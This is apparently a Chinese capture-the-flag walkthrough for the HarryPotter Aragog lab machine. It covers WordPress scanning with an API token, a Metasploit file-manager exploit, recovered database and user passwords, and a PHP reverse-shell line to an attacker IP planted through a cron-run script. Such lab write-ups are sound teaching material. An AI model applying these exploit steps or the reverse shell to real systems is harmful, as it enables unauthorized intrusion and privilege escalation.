harrypotter1-aragog靶机攻略

harrypotter1

扫描

nmap

指纹

目录

渗透

找到了登录位置

看到wordpress就用wpscan扫一扫

复制代码
wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

使用msf搜一下这个漏洞

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

复制代码
/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

复制代码
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

复制代码
root:mySecr3tPass

登入数据库

复制代码
mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

复制代码
hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

拿去md5解密,得到

复制代码
hagrid98:password123

提权

ssh连接登录成功

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

进入/tmp增加一个php文件,将下面反弹命令写入

复制代码
<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

开启监听端口

等待一会提权成功

获取第二个

相关推荐
叶落阁主20 小时前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954483 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954483 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star3 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954483 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher5 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行8 天前
网络安全总结
安全·web安全
red1giant_star8 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全